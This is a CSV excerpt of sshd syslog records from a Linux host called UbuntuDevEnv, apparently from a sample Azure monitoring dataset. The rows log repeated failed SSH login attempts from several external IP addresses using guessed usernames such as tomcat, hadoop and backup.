+16726,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:27:19,UbuntuDevEnv,2019-06-26 07:27:18,auth,UbuntuDevEnv,info,Invalid user anish from 64.202.187.152 port 50058,43475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,anish,64.202.187.1,50058,,
+16727,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:27:19,UbuntuDevEnv,2019-06-26 07:27:18,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=64.202.187.152,43475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,64.202.187.1,,0,
+16728,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:27:19,UbuntuDevEnv,2019-06-26 07:27:18,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,43475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16729,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:27:20,UbuntuDevEnv,2019-06-26 07:27:20,auth,UbuntuDevEnv,info,Failed password for invalid user amuiruri from 206.189.118.156 port 33318 ssh2,43471,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,amuiruri,206.189.118.1,33318,,
+16730,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:27:20,UbuntuDevEnv,2019-06-26 07:27:20,auth,UbuntuDevEnv,info,Disconnected from invalid user amuiruri 206.189.118.156 port 33318 [preauth],43471,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,amuiruri,206.189.118.1,33318,,
+16731,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:27:20,UbuntuDevEnv,2019-06-26 07:27:20,auth,UbuntuDevEnv,info,Received disconnect from 206.189.118.156 port 33318:11: Bye Bye [preauth],43471,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,206.189.118.1,33318,,
+16732,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:27:20,UbuntuDevEnv,2019-06-26 07:27:20,auth,UbuntuDevEnv,info,Failed password for invalid user anish from 64.202.187.152 port 50058 ssh2,43475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,anish,64.202.187.1,50058,,
+16733,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:27:21,UbuntuDevEnv,2019-06-26 07:27:20,auth,UbuntuDevEnv,info,Received disconnect from 64.202.187.152 port 50058:11: Bye Bye [preauth],43475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,64.202.187.1,50058,,
+16734,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:27:21,UbuntuDevEnv,2019-06-26 07:27:20,auth,UbuntuDevEnv,info,Disconnected from invalid user anish 64.202.187.152 port 50058 [preauth],43475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,anish,64.202.187.1,50058,,
+16735,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:27:48,UbuntuDevEnv,2019-06-26 07:27:48,auth,UbuntuDevEnv,info,Invalid user zipcode from 46.101.149.230 port 40170,43569,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zipcode,46.101.149.2,40170,,
+16736,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:27:48,UbuntuDevEnv,2019-06-26 07:27:48,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,43569,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16737,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:27:48,UbuntuDevEnv,2019-06-26 07:27:48,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=46.101.149.230,43569,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,46.101.149.2,,0,
+16738,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:27:50,UbuntuDevEnv,2019-06-26 07:27:49,auth,UbuntuDevEnv,info,Failed password for invalid user zipcode from 46.101.149.230 port 40170 ssh2,43569,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zipcode,46.101.149.2,40170,,
+16739,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:27:50,UbuntuDevEnv,2019-06-26 07:27:49,auth,UbuntuDevEnv,info,Disconnected from invalid user zipcode 46.101.149.230 port 40170 [preauth],43569,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zipcode,46.101.149.2,40170,,
+16740,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:27:50,UbuntuDevEnv,2019-06-26 07:27:49,auth,UbuntuDevEnv,info,Received disconnect from 46.101.149.230 port 40170:11: Bye Bye [preauth],43569,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,46.101.149.2,40170,,
+16741,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:28:22,UbuntuDevEnv,2019-06-26 07:28:22,auth,UbuntuDevEnv,info,Invalid user tomcat from 87.101.240.10 port 38100,43697,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tomcat,87.101.240.1,38100,,
+16742,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:28:22,UbuntuDevEnv,2019-06-26 07:28:22,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,43697,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16743,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:28:22,UbuntuDevEnv,2019-06-26 07:28:22,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=87.101.240.10,43697,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,87.101.240.1,,0,
+16744,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:28:24,UbuntuDevEnv,2019-06-26 07:28:24,auth,UbuntuDevEnv,info,Failed password for invalid user tomcat from 87.101.240.10 port 38100 ssh2,43697,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tomcat,87.101.240.1,38100,,
+16745,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:28:25,UbuntuDevEnv,2019-06-26 07:28:24,auth,UbuntuDevEnv,info,Received disconnect from 87.101.240.10 port 38100:11: Bye Bye [preauth],43697,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,87.101.240.1,38100,,
+16746,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:28:25,UbuntuDevEnv,2019-06-26 07:28:24,auth,UbuntuDevEnv,info,Disconnected from invalid user tomcat 87.101.240.10 port 38100 [preauth],43697,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tomcat,87.101.240.1,38100,,
+16747,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:28:52,UbuntuDevEnv,2019-06-26 07:28:51,auth,UbuntuDevEnv,info,Invalid user findftp from 206.189.118.156 port 50768,43803,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,findftp,206.189.118.1,50768,,
+16748,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:28:52,UbuntuDevEnv,2019-06-26 07:28:51,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,43803,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16749,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:28:52,UbuntuDevEnv,2019-06-26 07:28:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=206.189.118.156,43803,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,206.189.118.1,,0,
+16750,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:28:54,UbuntuDevEnv,2019-06-26 07:28:54,auth,UbuntuDevEnv,info,Failed password for invalid user findftp from 206.189.118.156 port 50768 ssh2,43803,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,findftp,206.189.118.1,50768,,
+16751,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:28:54,UbuntuDevEnv,2019-06-26 07:28:54,auth,UbuntuDevEnv,info,Disconnected from invalid user findftp 206.189.118.156 port 50768 [preauth],43803,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,findftp,206.189.118.1,50768,,
+16752,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:28:54,UbuntuDevEnv,2019-06-26 07:28:54,auth,UbuntuDevEnv,info,Received disconnect from 206.189.118.156 port 50768:11: Bye Bye [preauth],43803,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,206.189.118.1,50768,,
+16753,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:29:30,UbuntuDevEnv,2019-06-26 07:29:30,auth,UbuntuDevEnv,info,Invalid user hadoop from 45.55.190.46 port 38516,43886,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hadoop,45.55.190.4,38516,,
+16754,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:29:30,UbuntuDevEnv,2019-06-26 07:29:30,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,43886,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16755,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:29:30,UbuntuDevEnv,2019-06-26 07:29:30,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.55.190.46,43886,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.55.190.4,,0,
+16756,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:29:33,UbuntuDevEnv,2019-06-26 07:29:32,auth,UbuntuDevEnv,info,Failed password for invalid user hadoop from 45.55.190.46 port 38516 ssh2,43886,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hadoop,45.55.190.4,38516,,
+16757,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:29:33,UbuntuDevEnv,2019-06-26 07:29:33,auth,UbuntuDevEnv,info,Disconnected from invalid user hadoop 45.55.190.46 port 38516 [preauth],43886,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hadoop,45.55.190.4,38516,,
+16758,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:29:33,UbuntuDevEnv,2019-06-26 07:29:33,auth,UbuntuDevEnv,info,Received disconnect from 45.55.190.46 port 38516:11: Bye Bye [preauth],43886,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.55.190.4,38516,,
+16759,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:29:55,UbuntuDevEnv,2019-06-26 07:29:54,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=46.101.149.230  user=backup,44016,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,backup,46.101.149.2,,0,
+16760,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:29:57,UbuntuDevEnv,2019-06-26 07:29:56,auth,UbuntuDevEnv,info,Failed password for backup from 46.101.149.230 port 57292 ssh2,44016,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,46.101.149.2,57292,,
+16761,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:29:57,UbuntuDevEnv,2019-06-26 07:29:56,auth,UbuntuDevEnv,info,Received disconnect from 46.101.149.230 port 57292:11: Bye Bye [preauth],44016,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,46.101.149.2,57292,,
+16762,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:29:57,UbuntuDevEnv,2019-06-26 07:29:56,auth,UbuntuDevEnv,info,Disconnected from authenticating user backup 46.101.149.230 port 57292 [preauth],44016,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,backup,46.101.149.2,57292,,
+16763,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:30:23,UbuntuDevEnv,2019-06-26 07:30:22,auth,UbuntuDevEnv,info,Invalid user resto from 206.189.118.156 port 39988,44159,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,resto,206.189.118.1,39988,,
+16764,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:30:23,UbuntuDevEnv,2019-06-26 07:30:22,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=206.189.118.156,44159,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,206.189.118.1,,0,
+16765,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:30:23,UbuntuDevEnv,2019-06-26 07:30:22,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,44159,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16766,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:30:25,UbuntuDevEnv,2019-06-26 07:30:24,auth,UbuntuDevEnv,info,Failed password for invalid user resto from 206.189.118.156 port 39988 ssh2,44159,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,resto,206.189.118.1,39988,,
+16767,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:30:25,UbuntuDevEnv,2019-06-26 07:30:24,auth,UbuntuDevEnv,info,Received disconnect from 206.189.118.156 port 39988:11: Bye Bye [preauth],44159,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,206.189.118.1,39988,,
+16768,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:30:25,UbuntuDevEnv,2019-06-26 07:30:24,auth,UbuntuDevEnv,info,Disconnected from invalid user resto 206.189.118.156 port 39988 [preauth],44159,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,resto,206.189.118.1,39988,,
+16769,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:30:26,UbuntuDevEnv,2019-06-26 07:30:26,auth,UbuntuDevEnv,info,Invalid user gaurav from 87.101.240.10 port 55352,44176,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gaurav,87.101.240.1,55352,,
+16770,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:30:26,UbuntuDevEnv,2019-06-26 07:30:26,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,44176,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16771,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:30:26,UbuntuDevEnv,2019-06-26 07:30:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=87.101.240.10,44176,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,87.101.240.1,,0,
+16772,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:30:28,UbuntuDevEnv,2019-06-26 07:30:27,auth,UbuntuDevEnv,info,Failed password for invalid user gaurav from 87.101.240.10 port 55352 ssh2,44176,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gaurav,87.101.240.1,55352,,
+16773,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:30:28,UbuntuDevEnv,2019-06-26 07:30:28,auth,UbuntuDevEnv,info,Received disconnect from 87.101.240.10 port 55352:11: Bye Bye [preauth],44176,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,87.101.240.1,55352,,
+16774,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:30:28,UbuntuDevEnv,2019-06-26 07:30:28,auth,UbuntuDevEnv,info,Disconnected from invalid user gaurav 87.101.240.10 port 55352 [preauth],44176,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gaurav,87.101.240.1,55352,,
+16775,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:31:55,UbuntuDevEnv,2019-06-26 07:31:54,auth,UbuntuDevEnv,info,Invalid user liu from 206.189.118.156 port 57438,44540,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,liu,206.189.118.1,57438,,
+16776,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:31:55,UbuntuDevEnv,2019-06-26 07:31:54,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=206.189.118.156,44540,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,206.189.118.1,,0,
+16777,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:31:55,UbuntuDevEnv,2019-06-26 07:31:54,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,44540,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16778,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:31:57,UbuntuDevEnv,2019-06-26 07:31:56,auth,UbuntuDevEnv,info,Failed password for invalid user liu from 206.189.118.156 port 57438 ssh2,44540,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,liu,206.189.118.1,57438,,
+16779,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:31:57,UbuntuDevEnv,2019-06-26 07:31:56,auth,UbuntuDevEnv,info,Disconnected from invalid user liu 206.189.118.156 port 57438 [preauth],44540,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,liu,206.189.118.1,57438,,
+16780,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:31:57,UbuntuDevEnv,2019-06-26 07:31:56,auth,UbuntuDevEnv,info,Received disconnect from 206.189.118.156 port 57438:11: Bye Bye [preauth],44540,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,206.189.118.1,57438,,
+16781,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:32:04,UbuntuDevEnv,2019-06-26 07:32:04,auth,UbuntuDevEnv,info,Invalid user lie from 46.101.149.230 port 46182,44581,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lie,46.101.149.2,46182,,
+16782,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:32:04,UbuntuDevEnv,2019-06-26 07:32:04,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,44581,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16783,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:32:04,UbuntuDevEnv,2019-06-26 07:32:04,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=46.101.149.230,44581,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,46.101.149.2,,0,
+16784,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:32:06,UbuntuDevEnv,2019-06-26 07:32:05,auth,UbuntuDevEnv,info,Failed password for invalid user lie from 46.101.149.230 port 46182 ssh2,44581,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lie,46.101.149.2,46182,,
+16785,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:32:06,UbuntuDevEnv,2019-06-26 07:32:05,auth,UbuntuDevEnv,info,Disconnected from invalid user lie 46.101.149.230 port 46182 [preauth],44581,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lie,46.101.149.2,46182,,
